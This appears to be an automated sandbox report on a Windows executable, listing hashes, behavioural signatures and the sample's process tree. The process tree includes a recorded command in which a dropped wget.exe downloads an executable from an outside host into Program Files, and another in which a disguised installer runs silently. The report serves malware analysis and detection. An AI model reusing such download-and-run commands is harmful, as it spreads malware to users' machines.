Analysis
-
max time kernel
42s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
19-09-2022 12:28
Static task
static1
Behavioral task
behavioral1
Sample
01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
Resource
win7-20220812-en
General
-
Target
01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
-
Size
626KB
-
MD5
123dbc5d23301b384f8796fe9ab2f278
-
SHA1
38271921f6fc9a3dbd75224670f9603ab1248d73
-
SHA256
01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26
-
SHA512
ec16ef0b83c591b73b4b907ae71511134c9d9d80a646f6c0187e8da21c226378e90285466f2094e0f7a8d795e17eeb2b97915a480826efec698c5aaf8c8b6a34
-
SSDEEP
6144:+txgWaPErW1civwXSBxl7ju04CfOf/3ix/YheJvm3WeFAiAuzCe8JikKN0Y4RqCV:kGWgvxl7yC2nixMeJqLFPOikKad1KOl
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1220 wget.exe 2016 cmd.exe -
Loads dropped DLL 8 IoCs
pid Process 328 cmd.exe 328 cmd.exe 328 cmd.exe 2016 cmd.exe 2016 cmd.exe 2016 cmd.exe 620 MsiExec.exe 620 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: cmd.exe File opened (read-only) \??\P: cmd.exe File opened (read-only) \??\U: cmd.exe File opened (read-only) \??\Y: cmd.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: cmd.exe File opened (read-only) \??\I: cmd.exe File opened (read-only) \??\R: cmd.exe File opened (read-only) \??\V: cmd.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: cmd.exe File opened (read-only) \??\K: cmd.exe File opened (read-only) \??\O: cmd.exe File opened (read-only) \??\Q: cmd.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\F: cmd.exe File opened (read-only) \??\N: cmd.exe File opened (read-only) \??\T: cmd.exe File opened (read-only) \??\M: cmd.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: cmd.exe File opened (read-only) \??\S: cmd.exe File opened (read-only) \??\W: cmd.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: cmd.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: cmd.exe File opened (read-only) \??\E: cmd.exe File opened (read-only) \??\X: cmd.exe File opened (read-only) \??\Z: cmd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Common Files\pipi_dae_484.exe wget.exe File created C:\Program Files (x86)\Your Company\Your Application\ .txt msiexec.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\Installer\6c2c22.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI344D.tmp msiexec.exe File opened for modification C:\Windows\Installer\6c2c22.ipi msiexec.exe File created C:\Windows\Installer\6c2c20.msi msiexec.exe File opened for modification C:\Windows\Installer\6c2c20.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2D77.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2E72.tmp msiexec.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2F msiexec.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1360 PING.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1036 msiexec.exe 1036 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeShutdownPrivilege 2016 cmd.exe Token: SeIncreaseQuotaPrivilege 2016 cmd.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeSecurityPrivilege 1036 msiexec.exe Token: SeCreateTokenPrivilege 2016 cmd.exe Token: SeAssignPrimaryTokenPrivilege 2016 cmd.exe Token: SeLockMemoryPrivilege 2016 cmd.exe Token: SeIncreaseQuotaPrivilege 2016 cmd.exe Token: SeMachineAccountPrivilege 2016 cmd.exe Token: SeTcbPrivilege 2016 cmd.exe Token: SeSecurityPrivilege 2016 cmd.exe Token: SeTakeOwnershipPrivilege 2016 cmd.exe Token: SeLoadDriverPrivilege 2016 cmd.exe Token: SeSystemProfilePrivilege 2016 cmd.exe Token: SeSystemtimePrivilege 2016 cmd.exe Token: SeProfSingleProcessPrivilege 2016 cmd.exe Token: SeIncBasePriorityPrivilege 2016 cmd.exe Token: SeCreatePagefilePrivilege 2016 cmd.exe Token: SeCreatePermanentPrivilege 2016 cmd.exe Token: SeBackupPrivilege 2016 cmd.exe Token: SeRestorePrivilege 2016 cmd.exe Token: SeShutdownPrivilege 2016 cmd.exe Token: SeDebugPrivilege 2016 cmd.exe Token: SeAuditPrivilege 2016 cmd.exe Token: SeSystemEnvironmentPrivilege 2016 cmd.exe Token: SeChangeNotifyPrivilege 2016 cmd.exe Token: SeRemoteShutdownPrivilege 2016 cmd.exe Token: SeUndockPrivilege 2016 cmd.exe Token: SeSyncAgentPrivilege 2016 cmd.exe Token: SeEnableDelegationPrivilege 2016 cmd.exe Token: SeManageVolumePrivilege 2016 cmd.exe Token: SeImpersonatePrivilege 2016 cmd.exe Token: SeCreateGlobalPrivilege 2016 cmd.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe Token: SeRestorePrivilege 1036 msiexec.exe Token: SeTakeOwnershipPrivilege 1036 msiexec.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1504 wrote to memory of 328 1504 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe 27 PID 1504 wrote to memory of 328 1504 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe 27 PID 1504 wrote to memory of 328 1504 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe 27 PID 1504 wrote to memory of 328 1504 01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe 27 PID 328 wrote to memory of 1220 328 cmd.exe 29 PID 328 wrote to memory of 1220 328 cmd.exe 29 PID 328 wrote to memory of 1220 328 cmd.exe 29 PID 328 wrote to memory of 1220 328 cmd.exe 29 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 328 wrote to memory of 2016 328 cmd.exe 30 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 1036 wrote to memory of 620 1036 msiexec.exe 32 PID 328 wrote to memory of 1360 328 cmd.exe 33 PID 328 wrote to memory of 1360 328 cmd.exe 33 PID 328 wrote to memory of 1360 328 cmd.exe 33 PID 328 wrote to memory of 1360 328 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\~13D0.bat "C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Users\Admin\AppData\Local\wget.exe"C:\Users\Admin\AppData\Local\wget.exe" http://dl.pipi.cn/pipi_dae_484.exe -O "C:\Program Files\Common Files\pipi_dae_484.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1220
-
-
C:\Users\Admin\AppData\Local\cmd.exe"C:\Users\Admin\AppData\Local\cmd.exe" /i "C:\Users\Admin\AppData\Local\9pipi.ini" /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:1360
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 05B25124851CC1F4C4434EDD59A438DF2⤵
- Loads dropped DLL
PID:620
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
227KB
MD5f31229e1a5ec3e29e97a226a4d3e6605
SHA1caba5552aea1c48d1a03818034bfe02bc2c6c7f8
SHA256b45ac9b20b8046d2ade9738b2f6471ccd5767e21bdf4dec79af2a9ccaeb57923
SHA512902658752156d1e17242fda3ff38489724aec32f2eb2863daeccca1a7994c5edc7d089aef72c3bda57c5195759c6b6bdbd51fccf2fcda013dbeabcbfd0bd67d7
-
Filesize
227KB
MD5f31229e1a5ec3e29e97a226a4d3e6605
SHA1caba5552aea1c48d1a03818034bfe02bc2c6c7f8
SHA256b45ac9b20b8046d2ade9738b2f6471ccd5767e21bdf4dec79af2a9ccaeb57923
SHA512902658752156d1e17242fda3ff38489724aec32f2eb2863daeccca1a7994c5edc7d089aef72c3bda57c5195759c6b6bdbd51fccf2fcda013dbeabcbfd0bd67d7
-
Filesize
650B
MD5046935e6cb21508bad923f3a23722e02
SHA102eaca8f4737137098957648fa97488ad03264fe
SHA25676d7ccbe7d5ecf9138c14c26f56434c2c23c02e6b65f641f214c74e3f6ab048a
SHA5124cebbca7af12ee25d01a738568f158c8333a158a188f72338ad044eac562cbcdc5105dcba2a149bbfd8b2b705a03af316eae5933b89233b413100674b43b4530
-
Filesize
309B
MD5a167cf2a3d0c4ae66d94d56fdfdd07d5
SHA1f5446d546aaf51d803b6c7cd86985619953317ac
SHA256bb74012d828ac25079e3b132be116ea702b5fc225c946a2f4294ebeea2a38fed
SHA5129b48cd34bfea72c362d0cf8999383553a54c2cdbf41ddd52aa8e599d1ed999fef58695fda841d14180893006425c36233ed9b9e1ac2a4d3cef7bc7112748f7f2
-
Filesize
77KB
MD56c985ebcd34f92d666b365b28272195f
SHA103b8d4cf8171b650ed68efc3c41258878c35d433
SHA256a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70
-
Filesize
77KB
MD56c985ebcd34f92d666b365b28272195f
SHA103b8d4cf8171b650ed68efc3c41258878c35d433
SHA256a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70
-
Filesize
248KB
MD59ba065cdd2ef00f38eacde05d6606563
SHA1a5a1d20bb1456bcbefc689f16f38b0710259b414
SHA2560f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef
SHA5123f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262
-
Filesize
248KB
MD59ba065cdd2ef00f38eacde05d6606563
SHA1a5a1d20bb1456bcbefc689f16f38b0710259b414
SHA2560f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef
SHA5123f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262
-
Filesize
48KB
MD59067aad412defc0d2888479609041392
SHA136cfffc3bafeb24f88ad5886ca5787ca008b6ba9
SHA25699f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517
SHA512e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a
-
Filesize
48KB
MD59067aad412defc0d2888479609041392
SHA136cfffc3bafeb24f88ad5886ca5787ca008b6ba9
SHA25699f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517
SHA512e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a
-
Filesize
77KB
MD56c985ebcd34f92d666b365b28272195f
SHA103b8d4cf8171b650ed68efc3c41258878c35d433
SHA256a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70
-
Filesize
77KB
MD56c985ebcd34f92d666b365b28272195f
SHA103b8d4cf8171b650ed68efc3c41258878c35d433
SHA256a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70
-
Filesize
77KB
MD56c985ebcd34f92d666b365b28272195f
SHA103b8d4cf8171b650ed68efc3c41258878c35d433
SHA256a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70
-
Filesize
77KB
MD56c985ebcd34f92d666b365b28272195f
SHA103b8d4cf8171b650ed68efc3c41258878c35d433
SHA256a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99
SHA512c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70
-
Filesize
248KB
MD59ba065cdd2ef00f38eacde05d6606563
SHA1a5a1d20bb1456bcbefc689f16f38b0710259b414
SHA2560f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef
SHA5123f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262
-
Filesize
248KB
MD59ba065cdd2ef00f38eacde05d6606563
SHA1a5a1d20bb1456bcbefc689f16f38b0710259b414
SHA2560f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef
SHA5123f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262
-
Filesize
48KB
MD59067aad412defc0d2888479609041392
SHA136cfffc3bafeb24f88ad5886ca5787ca008b6ba9
SHA25699f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517
SHA512e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a
-
Filesize
48KB
MD59067aad412defc0d2888479609041392
SHA136cfffc3bafeb24f88ad5886ca5787ca008b6ba9
SHA25699f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517
SHA512e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a